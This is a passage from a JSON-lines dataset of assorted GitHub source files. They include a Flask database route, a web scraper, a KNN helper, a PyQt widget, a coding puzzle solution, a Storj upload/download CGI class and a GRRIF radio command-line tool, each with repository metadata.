publisher = request.form\n    name = publisher['name']\n    address = publisher['address']\n    phone = publisher['phone']\n    cur = mysql.get_db().cursor()\n    cur.execute(\"INSERT INTO publishers(Name, Address, Phone) VALUES(%s, %s, %s)\",(name,address, phone))\n    mysql.get_db().commit()\n    return redirect('/publishers')\n\n@app.route('/publishers')\ndef publishers():\n    cursor = mysql.get_db().cursor()\n    response = cursor.execute(\"SELECT * FROM publishers\")\n    # html = '' \n    if response > 0:\n        publishers = cursor.fetchall()\n        return render_template('publishers.html', list=publishers)\n\n# start server\nif __name__ == '__main__':\n    app.run(debug=True, port=3000)\n\n    # http://localhost:3000","repo_name":"ellidanae/new","sub_path":"hw4/Publishers/add/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5041986342","text":"# 58.com (58 Tongcheng) second-hand housing scraper\nimport requests\nimport re\nfrom multiprocessing import Pool\nfrom lxml import etree\nimport pymongo\n\nheaders = {\n    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0; Waterfox) Gecko/20100101 Firefox/56.2.4',\n}\n\ndef get_info(url):\n    res = requests.get(url, headers=headers)\n    selector = etree.HTML(res.text)\n    house_info_urls = selector.xpath('//div[@class=\"pic\"]/a/@href')\n    for house_url_detail in house_info_urls:\n        get_info_detail(house_url_detail)\n\ndef get_info_detail(house_url_detail):\n    res = requests.get(house_url_detail, headers=headers)\n\n    selector = etree.HTML(res.text)\n\n    title = re.findall('
(.*?)')[0].strip()\n    price = re.findall('(.*?)')[0].strip()\n    unit = re.findall('(.*?) ')[0].strip()\n    room = re.findall('.*?(.*?)')[0].strip()\n    area = re.findall('
.*?(.*?)')[0].strip()\n community_1 = selector.xpath('//ul[@class=\"house-basic-item3\"]/li[1]/span[2]/a[1]/text()')[0]\n community_2 = selector.xpath('//ul[@class=\"house-basic-item3\"]/li[1]/span[2]/a[2]/text()')[0]\n community = community_1 + community_2\n\n address_1 = selector.xpath('//ul[@class=\"house-basic-item3\"]/li[2]/span[2]/a[1]/text()')[0]\n address_2 = selector.xpath('//ul[@class=\"house-basic-item3\"]/li[2]/span[2]/a[2]/text()')[0]\n address = address_1 + address_2\n\n info = {\n 'title':title,\n }\n\n\n\ndef get_price(price):\n print(price)\n print()\n\nif __name__ == \"__main__\":\n urls = ['https://lz.58.com/ershoufang/pn{}/'.format(str(i)) for i in range(1, 70)]\n for url in urls:\n get_info(url)","repo_name":"laoniutoushx/Reptile","sub_path":"8.3_58house.py","file_name":"8.3_58house.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71155152749","text":"import pandas as pd\nimport random\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef knn_func(df_pca):\n from sklearn.model_selection import train_test_split\n\n x = df_pca.drop('Class', axis=1).values\n y = df_pca['Class'].values\n\n # Generate a random value for random_state\n random_state = random.randint(0, 999)\n # Split training set and test set\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=random_state, stratify=y)\n\n # Set up the parameter grid for grid search\n param_grid = {'n_neighbors': [3, 5, 7, 9, 11]}\n\n # Create a k-nearest neighbors (KNN) model\n knnModel = KNeighborsClassifier()\n\n # Perform grid search with cross-validation\n grid_search = GridSearchCV(knnModel, param_grid, cv=5)\n grid_search.fit(x_train, y_train)\n\n # Get the best model and its hyperparameters\n hyper_model = grid_search.best_estimator_\n hyper_params = grid_search.best_params_\n\n print(\"Best Hyperparameters:\", hyper_params)\n\n # Predict on the training data\n y_train_predicted = hyper_model.predict(x_train)\n train_accuracy = metrics.accuracy_score(y_train, y_train_predicted)\n print(\"Training Accuracy:\", train_accuracy)\n\n # Predict on the test data\n y_test_predicted = hyper_model.predict(x_test)\n test_accuracy = metrics.accuracy_score(y_test, y_test_predicted)\n print('Testing Accuracy: ', test_accuracy)\n\n # Build the DataFrame of the training set\n df_train = pd.DataFrame(x_train, columns=['PC1', 'PC2', 'PC3'])\n df_train['Class'] = y_train\n df_train['Predict'] = y_train_predicted\n\n # Build the DataFrame of the test set\n df_test = pd.DataFrame(x_test, columns=['PC1', 'PC2', 'PC3'])\n df_test['Class'] = y_test\n df_test['Predict'] = y_test_predicted\n\n # # Plot classification results using scatter matrix\n # plt.scatter(df_test['PC1'], df_test['PC2'], c=df_test['Predict'], marker='o', s=50, label='Predicted')\n # plt.scatter(df_test['PC1'], df_test['PC2'], c=df_test['Class'], marker='x', s=25, label='Actual')\n # plt.xlabel('PC1')\n # plt.ylabel('PC2')\n # plt.legend()\n\n # # Plot matrix of KNN predictions using heatmap\n # confusion_matrix = metrics.confusion_matrix(y_test, y_test_predicted)\n\n # sns.heatmap(confusion_matrix, annot=True, cmap='Blues', fmt='d')\n # plt.xlabel('Predicted')\n # plt.ylabel('Actual')\n # plt.show()\n\n return df_train, df_test","repo_name":"boyonglin/NTU_DBMS","sub_path":"Final 
Project/Package/fun_kNN.py","file_name":"fun_kNN.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41446743405","text":"import sys\nimport pandas as pd\n\nfrom PyQt5.QtWidgets import QWidget, QTextEdit, QVBoxLayout\nfrom PyQt5.QtCore import pyqtSignal\n\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\n\nclass MessageBox(QWidget):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.message = ''\n\n\t\tself.te = QTextEdit()\n\t\tself.te.setPlaceholderText('This meesage box will display important messages.')\n\t\tself.te.setReadOnly(True)\n\n\t\tself.setFixedHeight(200)\n\t\tself.setFixedWidth(250)\n\n\t\tlayout = QVBoxLayout()\n\t\tlayout.addWidget(self.te)\n\t\tlayout.setAlignment(QtCore.Qt.AlignCenter)\n\n\t\tself.setLayout(layout)\n\n\tdef on_sent_message(self, sent_message, hexColor='#000000'):\n\t\t#self.message += sent_message\n\t\tprefix = f''\n\t\tsuffix = f''\n\t\tmessage = prefix + f'{sent_message}' + suffix\n\t\tself.te.setText(message)","repo_name":"rongmon/rbcodes","sub_path":"GUIs/zgui/message_box.py","file_name":"message_box.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"4713964887","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n rows = [''] * numRows\n direction = 1\n current = 0\n \n if numRows == 1: return s\n\n for char in s:\n rows[current] += char\n if current == 0: direction = 1\n if current == numRows - 1: direction = -1\n\n current += direction\n\n output = ''\n for row in rows:\n output += row\n\n return output","repo_name":"yj199522/LeetCode","sub_path":"6-zigzag-conversion/6-zigzag-conversion.py","file_name":"6-zigzag-conversion.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70636408746","text":"import bblfsh_sonar_checks.utils as utils\n\nimport bblfsh\n\ndef check(uast):\n findings = []\n name2class = {}\n\n cl_nodes = bblfsh.filter(uast, \"//*[@roleDeclaration and @roleType]\")\n\n for cl in cl_nodes:\n jc = utils.JClass(cl)\n name2class[jc.name] = jc\n\n for clname, cl in name2class.items():\n if not cl.parent:\n continue\n\n methods = cl.methods\n for method in methods:\n par_class = name2class.get(cl.parent)\n if not par_class:\n continue\n\n for parmethod in par_class.methods:\n if parmethod.name != method.name and \\\n parmethod.name.lower() == method.name.lower():\n\n findings.append({\"msg\": \"Methods with same name but different casing in subclass: \"\n \"{}.{} and {}.{}\".format(clname, method.name, cl.parent, parmethod.name)})\n\n return findings\n\nif __name__ == '__main__': utils.run_default_fixture(__file__, check)\n","repo_name":"bblfsh/sonar-checks","sub_path":"bblfsh_sonar_checks/checks/java/RSPEC-1845.py","file_name":"RSPEC-1845.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"42076924330","text":"from typing import FrozenSet\r\n\r\nfrom ksc.expr import Expr, Var, Let, Lam, Const\r\nfrom ksc.visitors import ExprVisitor, ExprTransformer\r\nfrom ksc.parse_ks import parse_expr_string\r\n\r\n# This seems to cover all the cases.\r\nexpr = parse_expr_string(\r\n \"(let (a (if p (add b c) (neg b))) (assert (gt a 0) (build a (lam (i : Integer) i))))\"\r\n)\r\n\r\n\r\ndef test_visitor():\r\n 
class CountConsts(ExprVisitor):\r\n def __init__(self):\r\n super().__init__(False)\r\n self._count = 0\r\n\r\n def count(self, e: Expr):\r\n self.visit(e)\r\n return self._count\r\n\r\n def visit_const(self, c: Const):\r\n self._count += 1\r\n\r\n assert CountConsts().count(expr) == 1\r\n assert (\r\n CountConsts().count(\r\n parse_expr_string(\r\n \"(if (gt p 0) x (index a (build 10 (lam (i : Integer) (add i 2)))))\"\r\n )\r\n )\r\n == 3\r\n )\r\n\r\n\r\ndef test_expr_transformer():\r\n assert ExprTransformer().visit(expr) == expr\r\n\r\n # A simple, non-semantic-preserving, transformation - this does not rename binders.\r\n class VarRenamer(ExprTransformer):\r\n def visit_var(self, v: Var) -> Expr:\r\n return Var(v.name + \"2\")\r\n\r\n # Thus, check ExprTransformer traverses to the leaves.\r\n assert VarRenamer().visit(expr) == parse_expr_string(\r\n \"(let (a (if p2 (add b2 c2) (neg b2))) (assert (gt a2 0) (build a2 (lam (i : Integer) i2))))\"\r\n )\r\n\r\n\r\ndef test_expr_transformer_arg_passing():\r\n class UnboundVarRenamer(ExprTransformer):\r\n def visit_var(self, v: Var, bound_vars: FrozenSet[str]) -> Expr:\r\n return v if v.name in bound_vars else Var(v.name + \"_2\")\r\n\r\n def visit_let(self, l: Let, bound_vars: FrozenSet[str]) -> Expr:\r\n bound_here = (\r\n [l.vars.name] if isinstance(l.vars, Var) else [v.name for v in l.vars]\r\n )\r\n return Let(\r\n l.vars,\r\n self.visit(l.rhs, bound_vars),\r\n self.visit(l.body, bound_vars.union(bound_here)),\r\n )\r\n\r\n def visit_lam(self, l: Lam, bound_vars: FrozenSet[str]) -> Expr:\r\n return Lam(l.arg, self.visit(l.body, bound_vars.union([l.arg.name])))\r\n\r\n assert UnboundVarRenamer().visit(expr, frozenset()) == parse_expr_string(\r\n \"(let (a (if p_2 (add b_2 c_2) (neg b_2))) (assert (gt a 0) (build a (lam (i : Integer) i))))\"\r\n )\r\n","repo_name":"microsoft/knossos-ksc","sub_path":"test/python/test_visitors.py","file_name":"test_visitors.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"36058463652","text":"class User: \n def __init__(self, user_id: str, username: str) -> None:\n self.id = user_id\n self.username = username\n self.followers = 0\n self.following = 0\n \n def follow(self, user) -> None:\n user.followers += 1\n self.following += 1 \n \n\nuser_1 = User('1', 'Anna')\nuser_2 = User('2', 'Clark')\nuser_3 = User('3', 'Jack')\n\nuser_1.follow(user_2)\nuser_1.follow(user_3)\nprint(user_1.followers) \nprint(user_1.following) ","repo_name":"Anveks/Python-Basics","sub_path":"OOP/random/userClass.py","file_name":"userClass.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12303331829","text":"# -*- coding: utf-8 -*-\n# 43\n\nfilepath = 'neko_cabocha.txt'\nimport p41\n\ndef display_nv_relationship(text):\n for chunks in text:\n for i in range(len(chunks)):\n if '名詞' in chunks[i].get_pos():\n if '動詞' in chunks[chunks[i].dst].get_pos():\n print (chunks[i].get_text()+'\\t'+chunks[chunks[i].dst].get_text()).replace('、','').replace('。','')\n\n# display_nv_relationship(p41.create_Chunks(filepath))\n\n","repo_name":"kojino/nlp100","sub_path":"ch5/p43.py","file_name":"p43.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4492163633","text":"\n\nfrom ibvpy.mats.mats2D.mats2D_elastic.mats2D_elastic import 
MATS2DElastic\nfrom ibvpy.fets.fets2D.fets2D4q import FETS2D4Q\nfrom ibvpy.fets.fets2D.fets2D4q8u import FETS2D4Q8U\nfrom ibvpy.api import\\\n BCDofGroup, TStepper as TS, TLoop, TLine, RTDofGraph\nfrom ibvpy.rtrace.rt_domain_list_field import RTraceDomainListField\nfrom ibvpy.mesh.fe_grid import FEGrid\nfrom ibvpy.mesh.fe_refinement_grid import FERefinementGrid\nfrom ibvpy.mesh.fe_domain import FEDomain\n\nif __name__ == '__main__':\n\n fets_eval_4u = FETS2D4Q(mats_eval = MATS2DElastic())\n fets_eval_8u = FETS2D4Q8U(mats_eval = MATS2DElastic())\n \n fe_domain = FEDomain()\n\n fe_rgrid1 = FERefinementGrid( name = 'fe_rgrid1', fets_eval = fets_eval_4u, domain = fe_domain )\n\n fe_grid1 = FEGrid( name = 'fe_grid1', coord_max = (2.,6.,0.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid1 ) \n\n fe_grid2 = FEGrid( name = 'fe_grid2', coord_min = (2., 6, 0.),\n coord_max = (10, 15, 0.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid1 ) \n \n fe_rgrid2 = FERefinementGrid( name = 'fe_rgrid2', fets_eval = fets_eval_4u, domain = fe_domain )\n \n fe_grid3 = FEGrid( name = 'fe_grid3', coord_min = (0, 0, 1.),\n coord_max = (2., 6.,1.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid2 ) \n\n fe_grid4 = FEGrid( name = 'fe_grid4', coord_min = (2., 6, 1.),\n coord_max = (10, 15, 1.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid2 ) \n\n fe_rgrid3 = FERefinementGrid( name = 'fe_rgrid3', fets_eval = fets_eval_4u, domain = fe_domain )\n \n fe_grid5 = FEGrid( name = 'fe_grid5', coord_min = (0, 0, 2.),\n coord_max = (2., 6.,2.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid3 ) \n\n fe_grid6 = FEGrid( name = 'fe_grid6', coord_min = (2., 6, 2.),\n coord_max = (10, 15, 2.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid3 ) \n\n ts = TS( dof_resultants = True,\n sdomain = fe_domain,\n bcond_list = [BCDofGroup(var='f', value = 1., dims = [0],\n get_dof_method = fe_grid1.get_top_dofs ),\n BCDofGroup(var='u', value = 0., dims = [0,1],\n get_dof_method = fe_grid1.get_bottom_dofs ),\n ],\n rtrace_list = [ RTDofGraph(name = 'Fi,right over u_right (iteration)' ,\n var_y = 'F_int', idx_y = 0,\n var_x = 'U_k', idx_x = 1),\n RTraceDomainListField(name = 'Stress',\n var = 'sig_app', idx = 0, warp = False ),\n# RTraceDomainField(name = 'Displacement' ,\n# var = 'u', idx = 0),\n# RTraceDomainField(name = 'N0' ,\n# var = 'N_mtx', idx = 0,\n# record_on = 'update')\n ]\n )\n \n \n # Add the time-loop control\n tloop = TLoop( tstepper = ts,\n tline = TLine( min = 0.0, step = 1, max = 1.0 ))\n \n print(tloop.setup())\n \n from ibvpy.plugins.ibvpy_app import IBVPyApp\n ibvpy_app = IBVPyApp( ibv_resource = tloop )\n ibvpy_app.main()\n ","repo_name":"simvisage/bmcs","sub_path":"ibvpy/mesh/examples/domain_manipulations.py","file_name":"domain_manipulations.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72353685868","text":"# Using break and continue\n\n# break: used to terminate/exit the loop\n# continue: used to end an iteration and move onto the next iteration\n\n# Find something in an array\n\nneedle = \"apple\"\nhaystack = [\"banana\", \"orange\", \"watermelon\", \"apple\", \"melon\"]\n\nfor h in haystack:\n if needle == h:\n print(h)\n 
break\n","repo_name":"madqueendany/python-tutorials","sub_path":"14-Nov/break-continue.py","file_name":"break-continue.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70172119787","text":"def fixedXor(ip1, ip2):\n if(len(ip1) != len(ip2)):\n print(\"Error: length of inputs not same\")\n return null\n \n result = [0]*len(ip1)\n\n for i in range(len(ip1)):\n result[i] = ip1[i] ^ ip2[i]\n\n result = bytes(result)\n return result\n\n\ndef main():\n ip1 = input(\"First ip: \")\n ip2 = input(\"Second ip: \")\n ip1 = bytes.fromhex(ip1)\n ip2 = bytes.fromhex(ip2)\n result = fixedXor(ip1, ip2)\n print(result)\n\nif __name__ == \"__main__\":\n main() \n","repo_name":"D-setia/CryptoPals","sub_path":"set1/chall_2/fixedXor.py","file_name":"fixedXor.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9847270438","text":"# WRITE YOUR CODE HERE\ndef find_key(d, v):\n keys = list(d.keys())\n values = list(d.values())\n index = values.index(v)\n return keys[index]\n\n\n# test code below\nif __name__ == \"__main__\":\n example_dict = {\n 1 : ['red', 'blue', 'green'],\n 'Josh Jung' : (9, 10),\n 3 : {0 : 0},\n 9000 : 'impale mat a'\n}\n\n#key = find_key(example_dict, (0, 0))\n#print(key)\n\n","repo_name":"jesusrodriguezz/project1","sub_path":"code/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17477985457","text":"import pandas as pd\nimport json\nimport numpy as np\nnp.random.seed(42)\n\ndef sent_16():\n\ttop = 800000\n\tdf_pos = pd.read_csv('training.1600000.processed.noemoticon.csv', encoding='utf-8', header=None, usecols=[0,5]).head(top)\n\tdf_neg = pd.read_csv('training.1600000.processed.noemoticon.csv', encoding='utf-8', header=None, usecols=[0,5]).tail(top)\n\tdatabase = df_pos[5].tolist() + df_neg[5].tolist()\n\tlabels = df_pos[0].tolist() + df_neg[0].tolist()\n\tfor n, i in enumerate(labels):\n\t\tif i == 4:\n\t\t\tlabels[n] = 1\n\treturn database, labels\n\ndef sent_16_translate():\n\tdf = pd.read_csv('translate.csv', header=None, usecols=[0,4])\n\tdf_neg = df[df[4] == '0']\n\tdf_pos = df[df[4] == '1']\n\n\tdatabase = df_pos[0].tolist() + df_neg[0].tolist()\n\tlabels = df_pos[4].tolist() + df_neg[4].tolist()\n\tlabels = [int(i) for i in labels]\n\treturn database, labels\n\ndef political_data():\n\tdf = pd.read_csv('labeled_samples.csv', index_col=[0])\n\tdatabase = df['text'].tolist()\n\tlabels = df['label'].tolist()\n\treturn database, labels\n\t\ndef pos_neg():\n\tdatabase = []\n\tlabels = []\n\tfiles = ['negativos_stream_download.json', 'positivos_stream_download.json']\n\tfor file in files:\n\t\twith open(file, 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\ttry:\n\t\t\t\t\ttweet = json.loads(line)\n\t\t\t\t\ttry: \n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tx = ('from RT extended_full_text')\n\t\t\t\t\t\t\ttext = tweet[\"retweeted_status\"][\"extended_tweet\"][\"full_text\"]\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tx = ('from RT extended_text')\n\t\t\t\t\t\t\ttext = tweet[\"retweeted_status\"][\"text\"]\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tx = ('from extended_text')\n\t\t\t\t\t\t\ttext = tweet[\"extended_tweet\"][\"full_text\"]\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tx = ('from text')\n\t\t\t\t\t\t\ttext = 
tweet[\"text\"]\n\t\t\t\t\tdatabase.append(str(text))\n\t\t\t\t\tif 'negativo' in file:\n\t\t\t\t\t\tlabels.append(0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlabels.append(1)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\treturn database, labels\n","repo_name":"anjosma/sentiment-analysis_brazil-elections-2018","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"34157435211","text":"#!/usr/bin/python3\nprint(\"Content-Type:text/html;charset=utf-8\")\nprint()\nfrom array import array\nfrom datetime import datetime\nfrom uplink_python.errors import StorjException, BucketNotEmptyError, BucketNotFoundError\nfrom uplink_python.module_classes import ListObjectsOptions, Permission, SharePrefix\nfrom uplink_python.uplink import Uplink\nfrom dotenv import load_dotenv\nimport os\nimport sys\nimport requests\nimport cgi \nimport cgitb; cgitb.enable()\nimport json\n\n# LOAD CONTAINER VARIABLES\nload_dotenv()\n\nclass Credentials():\n def __init__(self):\n # Storj configuration information\n global api_key, satellite, encryption_passphrase, bucket, src_full_name, destination_full_filename\n api_key = os.getenv('API_KEY')\n satellite = os.getenv('SATELLITE')\n encryption_passphrase = os.getenv('ENCRYPTION_PASSPHRASE')\n bucket = \"uplink\"\n src_full_name = \"/Users/cloudninja/Desktop/ipfs.png\" # Source and destination path and file name for testing\n destination_full_filename =\"/Users/cloudninja/Desktop/ipfs3.png \"\n\nclass Methods():\n\n def StablishConnection(self):\n try:\n # create an object of Uplink class\n uplink = Uplink()\n # request access using passphrase\n #print(\"\\nRequesting Access using passphrase...\")\n access = uplink.request_access_with_passphrase(satellite, api_key,\n encryption_passphrase)\n #print(\"Request Access: SUCCESS!\")\n \n # open Storj project\n #print(\"\\nOpening the Storj project, corresponding to the parsed Access...\")\n project = access.open_project()\n #print(\"Desired Storj project: OPENED!\")\n return project\n #\n except StorjException as exception:\n print(\"Exception Caught: \", exception.details)\n\n def EnlistAllBuckets(self,project):\n try:\n # enlist all the buckets in given Storj project\n #print(\"\\nListing bucket's names and creation time...\")\n bucket_list = project.list_buckets()\n json_output = []\n for bucket in bucket_list:\n # as python class object\n # print(bucket.name, \" | \", datetime.fromtimestamp(bucket.created))\n # # as python dictionary\n data = bucket.get_dict()\n json_output.append(data)\n print(json_output)\n #print(\"Buckets listing: COMPLETE!\")\n #\n except StorjException as exception:\n print(\"Exception Caught: \", exception.details)\n\n def ListObject(self,project):\n try:\n # list objects in given bucket with above options or None\n #print(\"\\nListing object's names...\")\n objects_list = project.list_objects(bucket, ListObjectsOptions(recursive=True,\n system=True))\n # print all objects path\n json_output = []\n for obj in objects_list:\n # print(obj.key, \" | \", obj.is_prefix) # as python class object\n # print(obj.get_dict()) # as python dictionary\n data = obj.get_dict()\n json_output.append(data)\n print(json.dumps(json_output))\n #print(\"Objects listing: COMPLETE!\")\n #\n except StorjException as exception:\n print(\"Exception Caught: \", exception.details)\n\n def UploadObject(self,project,file_item):\n try:\n # upload file/object\n #print(\"\\nUploading data...\")\n # get handle of 
file to be uploaded\n            # file_handle = open(src_full_name, 'r+b')\n            # check if the file has been uploaded\n            if file_item.filename:\n                # strip the leading path from the file name\n                fn = os.path.basename(file_item.filename)\n                \n                # save the uploaded bytes to a local file first (open(...).write() returns a byte count, not a handle), then reopen that file for reading\n                with open(fn, 'wb') as local_copy:\n                    local_copy.write(file_item.file.read())\n                file_handle = open(fn, 'rb')\n\n                # get upload handle to specified bucket and upload file path\n                upload = project.upload_object(bucket, file_item.filename)\n                #\n                # upload file on storj\n                upload.write_file(file_handle)\n                #\n                # commit the upload\n                upload.commit()\n                # close file handle\n                file_handle.close()\n                print(\"Upload: Complete!\")\n                #\n            else:\n                print(\"Upload Failed\")\n        except StorjException as exception:\n            print(\"Exception Caught: \", exception.details)\n    \n    def DownloadObject(self,project):\n        try:\n            # download file/object\n            print(\"\\nDownloading data...\")\n            # get handle of file which data has to be downloaded\n            file_handle = open('/var/www/html/master/dcs-api/test/andres.txt', 'w+b')\n            # get download handle to specified bucket and object path to be downloaded\n            download = project.download_object(bucket, 'andres.txt') #Bucket, filename inside bucket\n            #\n            # download data from storj to file\n            download.read_file(file_handle)\n            #\n            # close the download stream\n            download.close()\n            # close file handle\n            file_handle.close()\n            #print(json.dumps(\"message: Download Complete\"\n            print(\"Download: COMPLETE!\")\n            #\n        except StorjException as exception:\n            print(\"Exception Caught: \", exception.details)\n","repo_name":"lcubestudios/dcs-api","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1961920201","text":"### [ GRRIF Tools by Julien 'fetzu' Bono ]\n## [ IMPORTS ]\nimport sys\nimport argparse\nfrom datetime import date, datetime\n\n## [ CONFIGURATION ]\n__version__ = \"0.8.1\"\n\n## [ Is CLI even cooler with argparse? ]\nparser = argparse.ArgumentParser(\n    description=\"A set of tools for Cool Cats™. Allows you to archive GRRIF's play history and scrobble it to last.fm (upcoming).\"\n)\n\nsubparsers = parser.add_subparsers(dest=\"command\")\n\narchive_parser = subparsers.add_parser(\"archive\", help=\"Archive GRRIF's play history.\")\narchive_parser.add_argument(\n    \"destination\",\n    choices=[\"print\", \"db\", \"txt\"],\n    help=\"Specify where to archive the play history (print to stdout, save to SQLite database or to text in YYYY/MM/DD.txt file(s)).\",\n)\narchive_parser.add_argument(\n    \"from_date\",\n    nargs=\"?\",\n    default=\"2021-01-01\",\n    help=\"Specify the start date for the archive in YYYY-MM-DD format. Defaults to 2021-01-01.\",\n)\narchive_parser.add_argument(\n    \"to_date\",\n    nargs=\"?\",\n    default=date.today().strftime(\"%Y-%m-%d\"),\n    help=f\"Specify the end date for the archive in YYYY-MM-DD format. Defaults to today ({date.today().strftime('%Y-%m-%d')}).\",\n)\n\nstats_parser = subparsers.add_parser(\n    \"stats\", help=\"Get some stats out of the database.\"\n)\nstats_subparsers = stats_parser.add_subparsers(dest=\"stats_command\")\nartists_parser = stats_subparsers.add_parser(\n    \"artists\", help=\"Display stats for artists\"\n)\nartists_parser.add_argument(\n    \"topofthepop\",\n    choices=[\"top10\", \"top25\", \"top100\"],\n    help=\"Display the top 10, 25 or 100 artists.\",\n)\nartists_parser.add_argument(\n    \"from_date\",\n    nargs=\"?\",\n    default=\"2021-01-01\",\n    help=\"Specify the start date for the stats in YYYY-MM-DD format. 
Defaults to 2021-01-01.\",\n)\nartists_parser.add_argument(\n    \"to_date\",\n    nargs=\"?\",\n    default=date.today().strftime(\"%Y-%m-%d\"),\n    help=f\"Specify the end date for the stats in YYYY-MM-DD format. Defaults to today ({date.today().strftime('%Y-%m-%d')}).\",\n)\ntracks_parser = stats_subparsers.add_parser(\"tracks\", help=\"Display stats for tracks\")\ntracks_parser.add_argument(\n    \"topofthepop\",\n    choices=[\"top10\", \"top25\", \"top100\"],\n    help=\"Display the top 10, 25 or 100 tracks.\",\n)\ntracks_parser.add_argument(\n    \"from_date\",\n    nargs=\"?\",\n    default=\"2021-01-01\",\n    help=\"Specify the start date for the stats in YYYY-MM-DD format. Defaults to 2021-01-01.\",\n)\ntracks_parser.add_argument(\n    \"to_date\",\n    nargs=\"?\",\n    default=date.today().strftime(\"%Y-%m-%d\"),\n    help=f\"Specify the end date for the stats in YYYY-MM-DD format. Defaults to today ({date.today().strftime('%Y-%m-%d')}).\",\n)\n\nscrobble_parser = subparsers.add_parser(\n    \"scrobble\",\n    help=\"Scrobble to Last.fm.\",\n)\nscrobble_subparsers = scrobble_parser.add_subparsers(dest=\"scrobble_command\")\n\nsettings_parser = scrobble_subparsers.add_parser(\n    \"settings\", help=\"Set your last.fm scrobbling settings\"\n)\nsettings_parser.add_argument(\n    \"API_KEY\",\n    type=str,\n    help=\"Your last.fm API Key\",\n)\nsettings_parser.add_argument(\n    \"API_SECRET\",\n    type=str,\n    help=\"Your last.fm API secret\",\n)\nsettings_parser.add_argument(\n    \"SESSION_KEY\",\n    type=str,\n    help=\"Your last.fm API session key\",\n)\n\nlivescrobble_parser = scrobble_subparsers.add_parser(\n    \"start\", help=\"Start scrobbling to last.fm now.\"\n)\n\n\nstream_parser = subparsers.add_parser(\n    \"play\",\n    help=\"Play GRRIF in your terminal!\",\n).add_argument(\n    \"quality\",\n    choices=[\"mp3_high\", \"mp3_low\", \"aac_high\"],\n    nargs=\"?\",\n    default=\"mp3_high\",\n    help=\"Specify streaming quality (default: mp3_high)\",\n)\n\nargs = parser.parse_args()\n\n\n## [ MAIN ]\ndef main():\n    print(\n        \"##########################################\\n\"\n        f\"##### [ GRRIF Tools version {__version__} ] ######\\n\"\n        \"##########################################\\n\"\n    )\n\n    # Displays argparse's help message if no arguments are given\n    if len(sys.argv) == 1:\n        parser.print_help()\n        sys.exit(1)\n\n    if args.command == \"archive\" or args.command == \"stats\":\n        # Set the base URL to scrape data from\n        BASE_URL = \"https://www.grrif.ch/recherche-de-titres/?date={}\"\n\n        # Set the date range to scrape data for\n        START_DATE = datetime.strptime(args.from_date, \"%Y-%m-%d\")\n        END_DATE = datetime.strptime(args.to_date, \"%Y-%m-%d\")\n\n    # Archive was passed !\n    if args.command == \"archive\":\n        # The \"save to SQLite database\" option was chosen\n        if args.destination == \"db\":\n            # Let the user know what we are attempting\n            print(\n                f\"Attempting to archive plays from {START_DATE.strftime('%Y-%m-%d')} to {END_DATE.strftime('%Y-%m-%d')} to a SQLite database.\"\n            )\n\n            # Import the necessary functions\n            from .grrif_archiver import plays_to_db\n\n            # Create/open the database\n            plays_to_db(BASE_URL, START_DATE, END_DATE)\n\n        # The \"save to text 